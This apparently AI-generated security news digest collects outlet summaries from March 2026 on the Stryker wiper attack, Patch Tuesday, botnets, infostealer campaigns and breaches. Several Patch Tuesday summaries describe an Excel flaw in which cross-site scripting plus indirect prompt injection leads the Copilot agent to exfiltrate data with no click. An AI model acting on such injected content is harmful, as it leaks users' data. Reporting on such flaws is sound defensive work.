Information Security News | AI Aggregator

Please be mindful of possible hallucinations. Verify information prior to taking action.
Stryker Cyber Attack – Hackers Claim System Breach and Device Wipe
Date: 2026-03-11 | Source: Cyber Security News
On March 11, 2026, Stryker suffered a significant cyberattack attributed to Iranian-linked Handala hackers, utilizing wiper malware to erase data from its network. The breach severely disrupted operations at its Cork headquarters and affected devices globally, leaving thousands unable to access critical systems. The attack involved the use of administrative accounts, defacement of login pages, and the erasure of data on managed devices, crippling Stryker's operations and potentially impacting the global medical supply chain.
2026-03-11 | Security Magazine: Suspected Iranian Cyberattack Targets U.S. Medtech Company Stryker
Stryker, a major U.S. medical technology company, is experiencing a global system outage due to a suspected cyberattack, potentially linked to the Iranian hacktivist group "Handala." The attack appears to be a destructive wiper-style incident, affecting devices running Microsoft Windows. Experts warn that such disruptions can severely impact healthcare supply chains. Organizations are advised to enhance network visibility, segment operational systems, and prevent data exfiltration to mitigate risks.
2026-03-11 | Krebs on Security: Iran-Backed Hackers Claim Wiper Attack on Medtech Firm Stryker
Iranian hacktivist group Handala claims responsibility for a wiper attack on Stryker, a Michigan-based medical technology firm, resulting in the shutdown of operations in 79 countries and the erasure of data from over 200,000 systems. The attack, described as retaliation for a U.S. missile strike in Iran, has led to communication disruptions among employees, with devices reportedly wiped via Microsoft Intune. Handala is linked to Iran's Ministry of Intelligence and Security and has targeted various entities, primarily in Israel.
2026-03-11 | TechCrunch: Pro-Iran hacktivist group says it is behind attack on medical tech giant Stryker
A pro-Iran hacktivist group, Handala, claims to have breached Stryker, a U.S. medical tech company, disrupting operations globally. They reported wiping over 200,000 systems and extracting 50 terabytes of data. Stryker confirmed severe disruptions affecting access to systems and services. Handala's actions are framed as retaliation for U.S. military actions in Iran. The group has previously targeted Israeli infrastructure and employs various cyberattack methods, including wiper malware and data theft.
2026-03-11 | Recorded Future: Medical device giant Stryker confirms cyberattack as employees say devices were wiped
Medical device manufacturer Stryker confirmed a cyberattack that disrupted operations, affecting its Microsoft environment. Employees reported that corporate devices were wiped, and access to email and work platforms was lost. The hacking group Handala claimed responsibility, alleging they wiped over 200,000 systems and stole 50 terabytes of data, citing a motive related to U.S. military actions in Iran. Stryker is implementing business continuity measures but has not commented on Handala's involvement.
2026-03-11 | ABC News: US medical equipment company Stryker says cyberattack disrupted its global networks
Stryker, a U.S. medical equipment company, reported a cyberattack that disrupted its global networks. The incident, which affected its Microsoft programs, is believed to be contained, with no indications of ransomware or malware. The hacking group Handala, linked to Iran, was reported to have appeared on company login pages. Stryker is based in Portage, Michigan, employs 56,000 people, and had over $25 billion in revenue in 2025.
2026-03-11 | Security Affairs: Pro-Palestinian hacktivist group Handala targets Stryker in global disruption
Pro-Palestinian hacktivist group Handala claims responsibility for a cyberattack on Stryker, alleging the wiping of over 200,000 systems and a global operational disruption. The attack, which occurred on March 11, 2026, resulted in the exfiltration of approximately 50TB of corporate data and forced Stryker to shut down offices in 79 countries. The company is collaborating with Microsoft to address the incident, which has led to a 3.2% drop in its stock value.
2026-03-11 | The Register: Iran-linked cyber crew says they hit US med-tech firm
A hacking group linked to Iran claimed responsibility for a cyberattack on US med-tech firm Stryker, causing a global network disruption. Stryker confirmed the incident but noted no ransomware or malware was involved. The group, Handala, alleged they wiped over 200,000 systems and stole 50 TB of data, citing retaliation for US airstrikes. They also claimed to have breached Verifone, which denied any intrusion. This incident highlights the escalating threat to critical healthcare infrastructure.
2026-03-11 | U.S. Securities and Exchange Commission (Filings): 8-K - STRYKER CORP (0000310764)
On March 11, 2026, Stryker Corporation reported a cybersecurity incident disrupting its Microsoft environment. The company activated its cybersecurity response plan and is investigating the incident with external experts. There is no indication of ransomware or malware, and the incident is believed to be contained. Disruptions to information systems and business applications are ongoing, with an unknown timeline for full restoration. The investigation continues, and the potential operational and financial impacts are still being assessed.
2026-03-11 | Cybersecurity Dive: Stryker experiencing widespread outage due to cyberattack
Stryker is facing a global network disruption due to a cyberattack, which reportedly involved hackers remotely wiping devices running Microsoft’s Windows OS. The company, based in Portage, Michigan, stated the incident was contained and did not involve ransomware. An Iran-linked group called Handala claimed responsibility, marking a significant escalation in their activities. Stryker has advised employees to disconnect from networks and is implementing business continuity measures to support customers.
2026-03-11 | Hack Read: Iran-Linked Handala Hackers Claim Major Hacks on Stryker and Verifone
On March 11, the Iran-linked Handala Hack Team claimed cyberattacks on Stryker Corporation and Verifone. Stryker confirmed a cyber incident affecting its Microsoft-based network, causing internal disruptions, but reported no ransomware or malware. Handala claimed to have wiped over 200,000 systems and extracted 50 terabytes of data, which Stryker has not verified. Verifone denied any breach or service disruption, despite Handala releasing screenshots suggesting access to its systems.
2026-03-12 | Infosecurity Magazine: Iran Claim Massive Cyber-Attack on MedTech Firm Stryker
Pro-Iranian hackers, the Handala group, claimed responsibility for a cyber-attack on medical tech firm Stryker, disrupting operations globally. They claimed to have wiped over 200,000 systems and exfiltrated 50TB of data. Stryker confirmed the incident, noting it caused significant disruptions to its Microsoft environment but indicated no ransomware or malware was involved. Experts suggest the attack may have exploited Microsoft Intune for mass device wiping, highlighting the risks of geopolitical conflicts impacting critical sectors like healthcare.
2026-03-12 | Help Net Security: War spreads into cyberspace after Iran-linked hackers hit medtech giant Stryker
An Iran-linked hacking group has attacked U.S. medical device company Stryker, causing global disruptions to its Microsoft systems. The attack, which began in the U.S. and affected thousands of employees in Ireland, resulted in the wiping of devices and extraction of 50 terabytes of data. Stryker stated there is no indication of malware or ransomware, and the situation is contained to its internal environment. The attack is viewed as retaliation for recent U.S. actions against Iran.
Welcoming Wiz to Google Cloud: Redefining security for the AI era
Date: 2026-03-11 | Source: Google Cloud
Google has acquired Wiz, a cloud and AI security platform, to enhance its security offerings for cloud and hybrid environments. This acquisition aims to provide comprehensive threat prevention, detection, and response capabilities, addressing the complexities of securing AI-generated software and multicloud systems. Wiz's platform will integrate with Google’s security tools, enabling organizations to proactively manage risks and protect AI workloads. Wiz will continue to support multiple cloud environments, including AWS and Azure.
2026-03-11 | TechCrunch: Google wraps up $32B acquisition of cloud cybersecurity startup Wiz
Google has acquired Israeli cybersecurity firm Wiz for $32 billion, marking its largest acquisition to date. Wiz specializes in cloud security, helping organizations prevent and respond to cybersecurity threats. The acquisition aims to enhance Google Cloud's security offerings while allowing Wiz to maintain its brand and commitment to securing customers across various cloud environments. Initial discussions began in 2024 with a lower offer, but negotiations resumed in 2025, leading to the final agreement.
2026-03-11 | Cybersecurity Dive: Google completes $32B acquisition of Wiz
Google has completed a $32 billion acquisition of Wiz, a cloud and AI security platform, enhancing its cybersecurity offerings for government and enterprise customers in multicloud environments. Wiz will maintain its brand while integrating with Google Cloud, providing a comprehensive security platform. This acquisition aims to improve threat prevention, detection, and response, while reducing security maintenance costs. Wiz's expertise will support secure AI application development amid rising risks.
2026-03-12 | Cyber Security News: Google Completes Acquisition of Wiz in Historic $32 Billion Deal
Google has completed its $32 billion acquisition of Wiz, a cloud and AI security platform, marking the largest deal in its history. Wiz, which crossed $1 billion in annual recurring revenue in 2025, will join Google Cloud while retaining its brand. The acquisition aims to enhance cloud security amid rising AI-related threats. The combined platform will offer unified security, AI-driven threat intelligence, and multicloud support, maintaining services for competitors to build enterprise trust.
Meta Ramps Up Efforts to Disrupt Industrialized Scamming
Date: 2026-03-11 | Source: Wired
Meta announced new account protections to combat industrial-scale scamming, including enhanced Messenger scam detection and warnings for suspicious WhatsApp activity. Collaborating with law enforcement, Meta disabled over 150,000 accounts linked to scams, resulting in 21 arrests. In 2025, it removed 10.9 million scam-related accounts and 159 million scam ads. The company aims for 90% of ad revenue from verified advertisers by 2026 and has developed AI systems to detect impersonation and deceptive links.
2026-03-11 | Recorded Future: Meta says it culled millions of scam ads amid accusations that it profits from them
Meta removed 159 million scam ads in 2025 and disabled 10.9 million accounts linked to criminal scam centers amid scrutiny from U.S. lawmakers. Americans lost over $10 billion to scams in 2023. Meta is collaborating with law enforcement, including the FBI and Thai police, to disrupt scam networks and has introduced new detection tools. Despite claims of significant ad revenue from scams, Meta asserts that scams undermine trust in its advertising ecosystem. The company aims for 90% of ad revenue to come from verified advertisers by 2026.
2026-03-11 | Help Net Security: Meta turns to AI to sniff out scams on Facebook, Messenger and WhatsApp
Meta has introduced advanced AI tools on Facebook, Messenger, and WhatsApp to combat scams by analyzing text, images, and context to identify scam patterns. The systems detect impersonation and deceptive links, alerting users to suspicious friend requests and potential scams. WhatsApp warns users about risky linking requests, while Messenger offers scam detection and recommended actions. Meta collaborates with law enforcement, having disabled over 150,000 scam-related accounts and contributed to 21 arrests. Awareness campaigns are also underway.
2026-03-11 | The Hacker News: Meta Disables 150K Accounts Linked to Southeast Asia Scam Centers in Global Crackdown
Meta disabled over 150,000 accounts linked to Southeast Asian scam centers, collaborating with authorities from multiple countries, resulting in 21 arrests by the Royal Thai Police. This follows a December 2025 initiative that removed 59,000 accounts. New tools include warnings for suspicious accounts on Facebook, alerts for WhatsApp linking requests, and advanced scam detection on Messenger. The U.K. government is launching an Online Crime Centre to combat cybercrime, utilizing AI to identify and disrupt scams.
2026-03-11 | Times Now: Meta Says Facebook, WhatsApp And Messenger Will Soon Warn Users About Online Scams
Meta is implementing new tools across Facebook, WhatsApp, and Messenger to warn users about online scams. The company acknowledges that while they actively find and remove malicious accounts, scammers often evade detection. The new alerts aim to notify users before they engage with potentially suspicious content.
2026-03-11 | The Guardian: Meta disables more than 150,000 accounts in crackdown on south-east Asian scam networks
Meta disabled over 150,000 accounts in a crackdown on Southeast Asian scam networks, with 21 arrests made by Thai police. The operation, supported by the FBI and other international agencies, targeted sophisticated online scams, including fake romantic relationships and cryptocurrency fraud. Meta introduced new protective tools, such as alerts for suspicious friend requests on Facebook and a WhatsApp warning system for fraudulent device-linking attempts. The crackdown reflects enhanced international cooperation against cybercrime.
2026-03-11 | The Register: Meta, international cops use handcuffs and AI to stop scammers
Meta has introduced anti-scam tools across WhatsApp, Facebook, and Messenger, including device linking warnings and alerts for suspicious friend requests. In collaboration with law enforcement, 21 alleged fraudsters were arrested, and over 150,000 scam-related accounts were disabled. New features include alerts for suspicious friend requests and advanced scam detection in Messenger. Meta's efforts aim to disrupt fraud, with partnerships involving the FBI and international agencies to combat scam centers targeting users globally.
2026-03-12 | CNET: Meta Launches AI Tools to Identify and Flag Messages From Scammers
Meta is launching AI tools to combat scams on WhatsApp, Facebook, and Messenger, addressing issues like fake profiles and phishing. In 2025, Meta removed over 159 million scam ads and deleted nearly 7 million scam accounts on WhatsApp. New features include pop-up warnings for suspicious account interactions and AI scans to identify scam content. However, concerns about privacy and data processing remain, with no specific rollout date provided for these tools.
2026-03-12 | Malwarebytes Labs: Meta rolls out anti-scam tools across WhatsApp, Facebook, and Messenger
Meta has introduced enhanced anti-scam tools across WhatsApp, Facebook, and Messenger to combat sophisticated fraud tactics, including celebrity impersonation and brand spoofing. New AI-powered features will flag suspicious friend requests and detect patterns in scam messages. Meta's ongoing anti-scam campaign has led to the removal of millions of scam ads and accounts. Despite these efforts, scrutiny from regulators continues, particularly regarding the company's handling of scam advertisements and revenue implications.
Microsoft Patch Tuesday March 2026 – 78 Vulnerabilities Fixed, Including One 0-day
Date: 2026-03-10 | Source: Cyber Security News
Microsoft's March 2026 Patch Tuesday, released on March 10, 2026, addresses 78 vulnerabilities, including one zero-day (CVE-2026-21262) and multiple Critical-rated flaws. Key vulnerabilities include three Critical Office flaws (CVE-2026-26144, CVE-2026-26113, CVE-2026-26110) and several Elevation of Privilege vulnerabilities in Windows components. Security teams are urged to prioritize patching these vulnerabilities to mitigate risks of exploitation.
2026-03-10 | Cyberscoop: Microsoft’s monthly Patch Tuesday is first in 6 months with no actively exploited zero-days
Microsoft's latest Patch Tuesday addressed 83 vulnerabilities, marking the first update in six months without any actively exploited zero-days. Notably, six vulnerabilities, including CVE-2026-23668 and CVE-2026-24291, are deemed more likely to be exploited. CVE-2026-26144 in Excel could allow data exfiltration via the Copilot Agent. Additionally, CVE-2026-26110 and CVE-2026-26113 in Office pose risks for remote code execution, potentially enabling attackers to control systems and deploy ransomware.
2026-03-10 | The Register: Critical Microsoft Excel bug weaponizes Copilot Agent for zero-click information disclosure attack
A critical-severity information disclosure vulnerability, CVE-2026-26144, has been identified in Microsoft Excel, allowing zero-click attacks via the Copilot Agent to exfiltrate data. This flaw requires network access but no user interaction. It poses significant risks in corporate environments due to potential silent data extraction. Recommendations include patching promptly, restricting outbound network traffic, and monitoring unusual requests. Additionally, two other publicly known vulnerabilities, CVE-2026-26127 and CVE-2026-21262, are noted but not actively exploited.
2026-03-10 | Security Affairs: Microsoft Patch Tuesday security updates for March 2026 fixed 84 bugs
On March 10, 2026, Microsoft released Patch Tuesday updates addressing 84 vulnerabilities across various products, including Windows, Office, and SQL Server. Eight flaws are rated Critical. Notable vulnerabilities include CVE-2026-26127 (CVSS 7.5), allowing denial of service in .NET apps, and CVE-2026-21262 (CVSS 8.8), enabling privilege escalation in SQL Server. The most severe flaw, CVE-2026-21536 (CVSS 9.8), allows remote code execution on Microsoft Devices Pricing Program services. None of the flaws are currently exploited.
2026-03-10 | CSO Online: March Patch Tuesday: Three high severity holes in Microsoft Office
In the March Patch Tuesday release, three high-severity vulnerabilities were identified in Microsoft Office. Notably, CVE-2026-23665 affects Azure Linux virtual machines, allowing unauthorized local privilege escalation (CVSS 8.1). Azure users must update the aadsshlogin package via their package manager. Additionally, CVE-2026-21262 in SQL Server (CVSS 8.8) could grant SQL sysadmin privileges, impacting versions 2016 and later. IT teams should maintain asset inventories for effective patch management in cloud environments.
2026-03-11 | Krebs on Security: Microsoft Patch Tuesday, March 2026 Edition
Microsoft's March 2026 Patch Tuesday addressed 77 vulnerabilities, including critical remote code execution flaws in Microsoft Office (CVE-2026-26113, CVE-2026-26110) and privilege escalation bugs (CVE-2026-24291, CVE-2026-24294). Notably, CVE-2026-21536, a critical bug discovered by an AI agent, highlights AI's role in vulnerability detection. Microsoft also issued an emergency update for Windows Server 2022 and Adobe fixed 80 vulnerabilities across its products.
2026-03-11 | Cyber Security News: Microsoft SQL Server Zero-Day Vulnerability Allows Attackers to Escalate Privileges
Microsoft disclosed a critical zero-day vulnerability in SQL Server (CVE-2026-21262) on March 10, 2026, allowing authenticated attackers to escalate privileges to sysadmin level. The flaw, due to improper access control, has a CVSS score of 8.8 and affects SQL Server 2016 to 2025. Microsoft released security updates and recommends immediate patching, auditing user permissions, and monitoring for unusual activity. Exploitation is assessed as "Less Likely," but public disclosure increases risk.
2026-03-11 | Cyber Security News: Microsoft .NET 0-Day Vulnerability Enables Denial-of-Service Attacks
An emergency security update has been released for a .NET Framework vulnerability (CVE-2026-26127) that allows unauthenticated remote attackers to trigger Denial-of-Service (DoS) conditions. With a CVSS score of 7.5, it affects .NET 9.0 and 10.0 on Windows, macOS, and Linux. Microsoft advises upgrading to .NET 9.0.14 and 10.0.4 and patching Microsoft.Bcl.Memory packages. Monitoring system logs for unusual activity is also recommended. No active exploitation has been reported.
2026-03-11 | The Hacker News: Microsoft Patches 84 Flaws in March Patch Tuesday, Including Two Public Zero-Days
Microsoft's March Patch Tuesday addressed 84 vulnerabilities, including two public zero-days: CVE-2026-26127 (7.5, denial-of-service in .NET) and CVE-2026-21262 (8.8, elevation of privilege in SQL Server). Notably, CVE-2026-21536 (9.8, remote code execution in Microsoft Devices Pricing Program) was fully mitigated. Key vulnerabilities include CVE-2026-25187 (7.8, Winlogon privilege escalation) and CVE-2026-26118 (8.8, server-side request forgery in Azure). Microsoft is also enhancing Windows Autopatch for faster security updates.
2026-03-11 | Infosecurity Magazine: Microsoft Fixes Two Publicly Disclosed Zero-Days
Microsoft's March Patch Tuesday addressed 79 vulnerabilities, including two zero-days: CVE-2026-21262, an SQL Server elevation of privilege (EoP) bug with a CVSS score of 8.8, and CVE-2026-26127, a denial-of-service flaw in .NET. The SQL Server vulnerability is concerning due to potential exposure, while the .NET flaw could allow attackers to exploit downtime for malicious activities. Overall, the majority of vulnerabilities this month are EoP-related, with three rated critical.
2026-03-11 | Hack Read: Microsoft Fixes 79 Flaws in March Patch Tuesday, Including Two 0-Days
Microsoft's March 2026 Patch Tuesday addresses 79 vulnerabilities, including three critical and two publicly disclosed zero-days. Key issues involve an out-of-bounds read in SQL Server allowing privilege escalation (CVSS 8.8) and a denial-of-service vulnerability in .NET. Critical vulnerabilities include a remote code execution flaw (CVSS 9.8) affecting the Devices Pricing Program. Organizations are advised to prioritize patch deployment for internet-facing services and systems handling sensitive data to mitigate risks.
2026-03-11 | Help Net Security: Microsoft patches 80+ vulnerabilities, six flagged as “more likely” to be exploited
In the March 2026 Patch Tuesday release, Microsoft addressed over 80 vulnerabilities, including two publicly disclosed flaws: CVE-2026-21262 in SQL Server and CVE-2026-26127 in .NET. Six vulnerabilities are flagged as “more likely” to be exploited, including CVE-2026-24289 and CVE-2026-26132 (Windows Kernel flaws) and CVE-2026-24294 (Windows SMB Server). CVE-2026-26123 affects Microsoft Authenticator, potentially exploitable via a rogue app. Rapid deployment of patches is recommended to maintain security.
2026-03-11 | Malwarebytes Labs: March 2026 Patch Tuesday fixes two zero-day vulnerabilities
Microsoft's March 2026 Patch Tuesday addresses 79 CVEs, including two zero-day vulnerabilities. CVE-2026-21262 (CVSS 8.8) in SQL Server allows privilege escalation to sysadmin without user interaction, posing significant data risks. CVE-2026-26127 (CVSS 7.5) in .NET can cause denial of service by crashing applications. Additionally, two remote code execution flaws in Office (CVE-2026-26110, CVE-2026-26113) and an information disclosure flaw (CVE-2026-26144) were noted. Users are advised to apply updates promptly.
2026-03-11 | TechRadar: This 'fascinating' Microsoft Excel security flaw teams up spreadsheets and Copilot Agent to steal data
Microsoft's March 2026 Patch Tuesday fixed 83 vulnerabilities, including a high-severity Excel flaw (CVE-2026-26144) rated 7.5/10. This vulnerability combines cross-site scripting and indirect prompt injection, enabling zero-click data theft via the Copilot AI assistant. Attackers can exfiltrate sensitive data without opening the file, merely by viewing it in the preview pane. Users are urged to apply the update, restrict outbound traffic, and consider disabling Copilot as mitigations.
2026-03-12 | Cyber Security News: Critical Microsoft Office Vulnerability Enables Remote Code Execution Attacks
On March 10, 2026, Microsoft addressed a critical vulnerability (CVE-2026-26110) in its Office suite, allowing remote code execution via local exploitation. The flaw, rated 8.4 on the CVSS scale, affects multiple Office applications across various platforms. Attackers can exploit this "Type Confusion" vulnerability without elevated privileges or user interaction, notably through the Windows Preview Pane. Microsoft advises immediate patching and suggests disabling the Preview Pane as a temporary measure.
2026-03-12 | Malwarebytes Labs: Microsoft Authenticator could leak login codes—update your app now
A vulnerability (CVE-2026-26123) in Microsoft Authenticator for iOS and Android could expose one-time sign-in codes to malicious apps on the same device. If exploited, attackers could access compromised accounts and services. Users are advised to update the app immediately via the App Store or Google Play Store. If unable to update, avoid installing new apps that handle authentication links and verify handlers when scanning QR codes. Consider alternative MFA options and use anti-malware protection.
KadNap Malware Infects 14,000+ Edge Devices to Power Stealth Proxy Botnet
Date: 2026-03-10 | Source: The Hacker News
KadNap malware has infected over 14,000 Asus routers, primarily in the U.S., since its detection in August 2025. It utilizes a custom Kademlia DHT protocol for stealthy communication with command-and-control servers. The malware is marketed via the proxy service Doppelgänger, which claims to offer anonymity. Users are advised to update devices, change passwords, and secure management interfaces. Additionally, a new Linux threat, ClipXDaemon, targets cryptocurrency users by hijacking clipboard addresses in X11 environments.
2026-03-11 | Security Affairs: KadNap bot compromises 14,000+ devices to route malicious traffic
KadNap malware has compromised over 14,000 devices, primarily ASUS routers, creating a stealth proxy botnet for routing malicious traffic. First detected in August 2025, it heavily targets the U.S. and utilizes a custom Kademlia-based peer-to-peer system to obscure its command infrastructure. Infected devices can execute additional payloads and maintain persistent communication with command-and-control servers. The botnet poses significant risks for organizations and individuals due to its evasion tactics and persistent nature.
2026-03-11 | TechRadar: Asus routers hijacked to power dangerous cybercrime proxy network - here's what we know
A new malware strain named KadNap has infected over 14,000 Asus routers, creating a botnet for malicious proxy traffic. Detected by Black Lotus, the botnet uses a custom Kademlia DHT protocol for resilience, allowing it to evade traditional monitoring. The majority of infected devices (60%) are in the US, with others in Taiwan, Hong Kong, and several European countries. KadNap supports a proxy network called Doppelgänger, which has already been deployed in the wild.
2026-03-11 | Ars Technica: 14,000 routers are infected by malware that's highly resistant to takedowns
Researchers have identified a botnet named KadNap, infecting approximately 14,000 routers, primarily Asus models, exploiting unpatched vulnerabilities. The botnet, which has grown from 10,000 infections since last August, is mostly located in the US, with smaller numbers in Taiwan, Hong Kong, and Russia. Its peer-to-peer design using distributed hash tables enhances resistance to detection and takedowns, complicating efforts for defenders. The malware does not appear to utilize zero-day exploits.
Fake job applications pack malware that kills endpoint detection before stealing data
Date: 2026-03-10 | Source: The Register
A Russian-speaking cybercriminal group is targeting corporate HR teams with fake job applications that deploy malware to disable security tools and steal data. The malware, delivered as an ISO file, uses a component called "BlackSanta" to disable EDR and antivirus software. Once defenses are down, it collects sensitive information, particularly related to cryptocurrency. The report emphasizes the need for organizations to apply stringent security measures to HR processes, similar to those in finance and IT.
2026-03-10 | Help Net Security: HR, recruiters targeted in year-long malware campaign
A year-long malware campaign targeting HR departments and recruiters has been uncovered, utilizing a resume-themed ISO file to initiate infections. The malware employs techniques to evade detection, including disabling antivirus software and checking for virtual environments. Key components include a malicious DWrite.dll and a new EDR killer named BlackSanta, which disrupts security processes. The ultimate payload remains unidentified due to an unavailable C2 server, but it likely involves information-stealing modules.
2026-03-11 | TechRadar: Russian hackers target HR departments with vicious new 'BlackSanta' malware
Russian hackers are targeting HR departments globally with a new malware called BlackSanta, utilizing phishing emails that link to malicious ISO files. The infection chain involves downloading a PowerShell script that retrieves a DLL file, which disables endpoint detection and response (EDR) tools, allowing further payloads to be deployed. The attackers' identity remains unclear, and while they have been observed in the wild, the number of affected organizations has not been disclosed.
2026-03-11 | Hack Read: BlackSanta Malware Targets HR Staff with Fake CV Downloads
A report by Aryaka on 11 March 2026 reveals the BlackSanta malware campaign targeting HR staff. This Russian-speaking group exploits recruitment workflows by sending emails with links to CVs, leading to the download of malicious ISO files. Utilizing steganography, the malware hides code in images and remains dormant in secure environments. Its BlackSanta module employs BYOVD to exploit vulnerabilities, gaining kernel access to disable security tools and search for sensitive data.
2026-03-11 | Infosecurity Magazine: BlackSanta EDR-Killer Targets HR Teams in CV-Themed Campaign
A new malware campaign, identified by Aryaka Threat Research Lab, targets HR teams by distributing malicious files disguised as job applications. The BlackSanta tool disables endpoint detection and response (EDR) systems post-compromise. Attackers use phishing emails to initiate a multi-stage infection, gathering system information while evading detection. The campaign exploits recruitment workflows, posing a significant risk to organizations. Enhanced monitoring and stronger endpoint protection are recommended to mitigate such threats.
2026-03-11 | CSO Online: Resumés with malicious ISO attachments are circulating, says Aryaka
Threat actors are targeting HR departments with phishing emails containing malicious resumés that include ISO file attachments. Researchers at Aryaka report that when the ISO is mounted, it executes a malicious shortcut that runs obfuscated PowerShell commands to extract hidden payloads from a steganographic image. This process sideloads a malicious DLL using a legitimate application, enabling the attacker to harvest data from the infected system.
When Trusted Websites Turn Malicious: WordPress Compromises Advance Global Stealer Operation
Date: 2026-03-10 | Source: Rapid7
Rapid7 Labs has identified a widespread compromise of over 250 legitimate WordPress websites, exploited by an unknown threat actor to inject a ClickFix implant that mimics a Cloudflare CAPTCHA. This multi-stage malware chain targets Windows systems to steal credentials and digital wallets. Active since December 2025, the campaign utilizes various infostealers, including evolved Vidar and new VodkaStealer. Recommendations for mitigation include regular software updates, strong passwords, and two-factor authentication.
2026-03-10 | The Register: Crooks compromise WordPress sites to push infostealers via fake CAPTCHA prompts
Crooks have compromised legitimate WordPress sites, including a US Senate candidate's campaign page, to distribute infostealers via fake Cloudflare CAPTCHA prompts. Researchers at Rapid7 found that these prompts trick users into executing commands that download credential-stealing malware. The campaign, active since at least December 2025, has affected over 250 websites across 12 countries. The attackers leverage the reputation of compromised sites to evade suspicion, indicating a high level of automation in their operations.
2026-03-11 | Infosecurity Magazine: Compromised WordPress Sites Deliver ClickFix Attacks in Global Infostealer Campaign
A global cyber-criminal campaign has compromised over 250 legitimate WordPress sites to deliver infostealer malware, impacting users in at least 12 countries. The attackers exploit user trust by presenting a fake Cloudflare Captcha to initiate malware installation. Payloads include Vidar Stealer and Vodka Stealer, aimed at stealing sensitive data. Rapid7 suggests vulnerabilities in plugins or brute-force attacks may be the compromise method. Recommendations include regular software reviews, strong passwords, and two-factor authentication.
2026-03-11 | TechRadar: Hackers hijack WordPress sites to spread malware using fake CAPTCHA
Hackers are exploiting vulnerable WordPress sites to distribute malware through a fake Cloudflare CAPTCHA, as reported by Rapid7. This ongoing campaign, which began in December 2025, has compromised over 250 sites, including a US Senate candidate's page. Attackers gain access via weak credentials or unpatched plugins, then prompt users to run a command that downloads an infostealer, targeting sensitive data like login credentials and cryptocurrency information. The campaign demonstrates high automation and broad targeting.
Ericsson US confirms breach after third-party provider attack
Date: 2026-03-10 | Source: Security Affairs
Ericsson US confirmed a data breach following a hack of a third-party service provider, exposing employee and customer information. The incident occurred between April 17 and 22, 2025, prompting the service provider to notify the FBI and engage cybersecurity specialists. Affected individuals are offered complimentary identity protection services through IDX, including credit monitoring and identity theft recovery. No misuse of data has been detected, and no ransomware group has claimed responsibility.
2026-03-10 | The Register: Ericsson blames vendor vishing slip-up for breach exposing thousands of records
A voice-phishing scam targeting a third-party vendor of Ericsson exposed personal data of over 15,000 individuals. The breach occurred between April 17 and 22, 2025, and was discovered on April 28. Data potentially compromised includes names, Social Security numbers, addresses, and financial information. Ericsson was notified on November 10, 2025, and confirmed 15,661 individuals were affected by February 23, 2026. Affected individuals are offered 12 months of credit monitoring. The vendor has since implemented new safeguards.
2026-03-10 | TechRadar: Ericsson US reveals employee and customer data breach after third-party hack
Ericsson US confirmed a third-party data breach affecting over 4,000 customers, exposing sensitive data including names, addresses, SSNs, financial information, and medical details. The breach was detected on April 28, 2025, prompting an investigation and notification to the FBI. To mitigate impact, Ericsson is offering free identity theft protection services for 12 months through IDX. No evidence of misuse has been reported, and no threat actors have claimed responsibility.
2026-03-10 | Infosecurity Magazine: Ericsson Breach Exposes Data of 15k Employees and Customers
A data breach at Ericsson Inc. has exposed personal information of 15,661 employees and customers due to unauthorized access via a third-party service provider. Detected on April 28, 2025, the breach occurred between April 17 and April 22, 2025. Affected data includes names, Social Security Numbers, financial information, and medical details. Ericsson is offering complimentary identity protection services through IDX and has not identified evidence of misuse of the data.
CISA Flags SolarWinds, Ivanti, and Workspace One Vulnerabilities as Actively Exploited
Date: 2026-03-10 | Source: The Hacker News
CISA has added three vulnerabilities to its Known Exploited Vulnerabilities catalog due to active exploitation: 1. CVE-2021-22054 (CVSS 7.5) - SSRF in Omnissa Workspace One UEM. 2. CVE-2025-26399 (CVSS 9.8) - Deserialization vulnerability in SolarWinds Web Help Desk, exploited by the Warlock ransomware group. 3. CVE-2026-1603 (CVSS 8.6) - Authentication bypass in Ivanti Endpoint Manager. FCEB agencies must apply fixes by March 12 and March 23, 2026, depending on the vulnerability.
2026-03-10 | Security Affairs: U.S. CISA adds Ivanti EPM, SolarWinds, and Omnissa Workspace One flaws to its Known Exploited Vulnerabilities catalog
U.S. CISA has added three vulnerabilities to its Known Exploited Vulnerabilities catalog: CVE-2021-22054 (Omnissa Workspace ONE, CVSS 7.5), CVE-2025-26399 (SolarWinds Web Help Desk, CVSS 9.8), and CVE-2026-1603 (Ivanti EPM, CVSS 8.6). Federal agencies must remediate CVE-2026-1603 and CVE-2021-22054 by March 23, 2026, and CVE-2025-26399 by March 12, 2026. Organizations are advised to review and address these vulnerabilities to protect their networks.
2026-03-10 | Cyber Security News: CISA Warns of Ivanti Endpoint Manager Authentication Bypass Vulnerability Exploited in Attacks
CISA added CVE-2026-1603, an authentication bypass vulnerability in Ivanti Endpoint Manager, to its KEV catalog on March 9, 2026. This flaw affects all versions prior to 2024 SU5, allowing remote, unauthenticated attackers to access sensitive credential data. Exploitation can lead to credential leaks and privilege escalation. Affected organizations must patch by March 23, 2026. CISA recommends blocking access to management ports and monitoring logs for unusual activity until the patch is applied.
2026-03-11 | CSO Online: CISA warns of actively exploited Ivanti EPM and Cisco SD-WAN flaws
CISA has issued a warning regarding an actively exploited authentication bypass vulnerability in Ivanti Endpoint Manager (EPM), tracked as CVE-2026-1603, affecting versions prior to 2024 SU5. This flaw allows remote, unauthenticated attackers to leak stored credentials. It was patched on February 9, alongside CVE-2026-1602. Additionally, CISA updated its directive on two Cisco Catalyst SD-WAN vulnerabilities that were also fixed last month after being exploited in zero-day attacks.
Russian military hackers revive advanced malware to spy on Ukraine, researchers say
Date: 2026-03-10 | Source: Recorded Future
Russian state hacker group APT28 has revived advanced malware to spy on Ukrainian military targets, according to ESET. Since April 2024, they have deployed implants like BeardShell and Covenant, with SlimAgent detected on a Ukrainian government computer. BeardShell executes PowerShell commands, while Covenant serves as a command-and-control framework. The resurgence of sophisticated malware may be linked to Russia's invasion of Ukraine or a shift in operational tactics. APT28's activities have also led to diplomatic tensions in Europe.
2026-03-10 | ESET WeLiveSecurity: Sednit reloaded: Back in the trenches
Sednit, also known as APT28, has reactivated its advanced implant team since April 2024, deploying two main tools: BeardShell and Covenant, targeting Ukrainian military personnel. SlimAgent, a keylogger derived from the older Xagent, was first identified in a Ukrainian governmental machine. BeardShell executes PowerShell commands via Icedrive as its C&C channel, while Covenant, modified for long-term espionage, utilizes various cloud providers for communication. Sednit's operations indicate a return to sophisticated malware development.
2026-03-10 | The Hacker News: APT28 Uses BEARDSHELL and COVENANT Malware to Spy on Ukrainian Military
